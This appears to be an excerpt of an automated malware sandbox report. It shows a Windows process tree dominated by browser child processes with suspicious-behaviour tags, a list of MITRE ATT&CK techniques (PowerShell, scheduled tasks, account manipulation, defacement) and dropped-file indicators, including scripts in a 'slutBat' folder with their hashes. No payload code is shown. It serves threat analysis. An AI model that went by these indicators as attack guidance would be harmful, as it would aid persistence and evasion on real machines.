  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2376,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2324 /prefetch:13
  2⤵
  PID:6112
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3212,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3252 /prefetch:1
  2⤵
  PID:5784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3308 /prefetch:1
  2⤵
  PID:412
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4200,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4228 /prefetch:9
  2⤵
  PID:5356
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4596,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4632 /prefetch:1
  2⤵
  PID:912
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5092,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5272 /prefetch:14
  2⤵
  PID:5596
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5368,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5388 /prefetch:14
  2⤵
  PID:5348
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5360,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5300 /prefetch:14
  2⤵
  PID:552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5384,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5432 /prefetch:14
  2⤵
  PID:3564
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5488,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5792 /prefetch:14
  2⤵
  PID:4532
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5300,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5776 /prefetch:14
  2⤵
  PID:4556
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4796,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5884 /prefetch:1
  2⤵
  PID:6080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3536,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3572 /prefetch:12
  2⤵
  PID:4872
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5916,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5920 /prefetch:14
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:5236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=3300,i,6763271550714158431,5369096162559944092,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3828 /prefetch:14
  2⤵
  - NTFS ADS
  PID:2436

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:5520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:6020

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004CC 0x00000000000004C4
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5464

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd8a2bdcf8,0x7ffd8a2bdd04,0x7ffd8a2bdd10
  2⤵
  PID:4236
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --field-trial-handle=1804,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=2052 /prefetch:11
  2⤵
  PID:1860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2028,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=2024 /prefetch:2
  2⤵
  PID:6140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --field-trial-handle=2348,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=2304 /prefetch:13
  2⤵
  PID:2664
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3264,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=3280 /prefetch:1
  2⤵
  PID:1032
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3232,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:4728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4208,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=4228 /prefetch:9
  2⤵
  PID:5620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4620,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=4656 /prefetch:1
  2⤵
  PID:5052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5280,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=5300 /prefetch:14
  2⤵
  PID:3372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5496,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=5508 /prefetch:14
  2⤵
  PID:1160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=5336,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=5424 /prefetch:1
  2⤵
  PID:4072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=3548,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=3520 /prefetch:12
  2⤵
  PID:3140
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=3348,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=3412 /prefetch:1
  2⤵
  PID:5936
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5424,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=5300 /prefetch:14
  2⤵
  - Modifies registry class
  - Suspicious use of SetWindowsHookEx
  PID:4384
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --field-trial-handle=5520,i,17016123109476306338,14879655662164675704,262144 --variations-seed-version=20250327-180155.299000 --mojo-platform-channel-handle=5784 /prefetch:14
  2⤵
  - NTFS ADS
  PID:5708

C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"
1⤵
PID:4952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s NPSMSvc
1⤵
PID:5412

C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
1⤵
- Modifies registry class
PID:3620

C:\Windows\System32\oobe\UserOOBEBroker.exe
C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding
1⤵
- Drops file in Windows directory
PID:4320

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:6016

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://go.microsoft.com/fwlink/?LinkId=335789
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
PID:5960
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x300,0x304,0x308,0x2fc,0x320,0x7ffd816ff208,0x7ffd816ff214,0x7ffd816ff220
  2⤵
  PID:5496
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1876,i,15588089376958329968,1429208565313187651,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:11
  2⤵
  PID:2064
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2224,i,15588089376958329968,1429208565313187651,262144 --variations-seed-version --mojo-platform-channel-handle=2220 /prefetch:2
  2⤵
  PID:352
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2524,i,15588089376958329968,1429208565313187651,262144 --variations-seed-version --mojo-platform-channel-handle=2544 /prefetch:13
  2⤵
  PID:1136
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3492,i,15588089376958329968,1429208565313187651,262144 --variations-seed-version --mojo-platform-channel-handle=3556 /prefetch:1
  2⤵
  PID:2336
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3528,i,15588089376958329968,1429208565313187651,262144 --variations-seed-version --mojo-platform-channel-handle=3580 /prefetch:1
  2⤵
  PID:2436
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4760,i,15588089376958329968,1429208565313187651,262144 --variations-seed-version --mojo-platform-channel-handle=4864 /prefetch:14
  2⤵
  PID:32
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
  2⤵
  - Drops file in Windows directory
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Modifies registry class
  PID:5524
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x268,0x7ffd816ff208,0x7ffd816ff214,0x7ffd816ff220
    3⤵
    PID:5560
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1828,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=2240 /prefetch:11
    3⤵
    PID:6100
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2212,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=2208 /prefetch:2
    3⤵
    PID:4716
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2464,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=2352 /prefetch:13
    3⤵
    PID:3612
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4300,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=4328 /prefetch:14
    3⤵
    PID:5676
- - C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4300,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=4328 /prefetch:14
    3⤵
    PID:3864
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4436,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=4564 /prefetch:14
    3⤵
    PID:2748
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4704,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=4724 /prefetch:14
    3⤵
    PID:196
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4584,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=4844 /prefetch:14
    3⤵
    PID:4732
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4644,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=4748 /prefetch:14
    3⤵
    PID:4916
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4852,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=4656 /prefetch:14
    3⤵
    PID:6132
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4800,i,1073232567510399197,12792915088437703269,262144 --variations-seed-version --mojo-platform-channel-handle=4480 /prefetch:14
    3⤵
    PID:872

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:3124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
1⤵
PID:3824
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
  2⤵
  PID:2052

C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\elevation_service.exe"
1⤵
PID:4000

C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe
C:\Users\Admin\AppData\Local\Microsoft\OneDrive\18.151.0729.0013\FileCoAuth.exe -Embedding
1⤵
- System Location Discovery: System Language Discovery
PID:492

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService
1⤵
PID:5628

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Account Manipulation

T1098

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Browser Information Discovery

T1217

Permission Groups Discovery

T1069

Local Groups

T1069.001

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\User Account Pictures\user-48.png

Filesize
718KB

MD5
24b62be2c7febe328af40a269e545bfa

SHA1
9c150298dd10fc9844327969b572ab63f1754cee

SHA256
16aed35c1ae9912ed7ee9aeeec96f823325399aa25a1450bb1cdc36c5394004d

SHA512
1cc6280a324444a414505a07404f50a444c9e5c00bdedbf298e7a17ff29094fb8efa4ed5aff9738603cdafce84af34fe27434365325bd6b3a4a1de5641447f2c

Download Submit
C:\ProgramData\slutBat\powershell.ps1

Filesize
620B

MD5
db71a767be6a7ef02863f7f14239e938

SHA1
77efe77c9130958c53861542b367bebe4f1ac923

SHA256
1b962e9b99cbc917445d34f3aa00bf89757dd39f9c7e66756165e03ef0e32abd

SHA512
702d720537cac5a52acfd64a1e2a5cbeea3d6639bf9a951114ed3dfe018dc1ae6c24bc8f5424d36a8750cb62d841f410c96090e5ace7debd1089ebbae75bc100

Download Submit
C:\ProgramData\slutBat\updateFiles.bat

Filesize
422B

MD5
65c728e31ad33ac81acad178a62b615e

SHA1
20e6c11b08d77f348f9af1b0ef911ebeba5c1593

SHA256
9fc617dcfa68a2f35b1f776460389cce06a1eb40ed8ac8279e23ed76610edf82

SHA512
884e09e188365e4f4f84dfa8d9947c81480ef9c333bf57eec93837b2911d03897c06829079f682d8b031796e9cd56bfbd968a08acd716af4b24c89deae6fa073

Download Submit
C:\ProgramData\slutBat\updateFiles.vbs

Filesize
180B

MD5
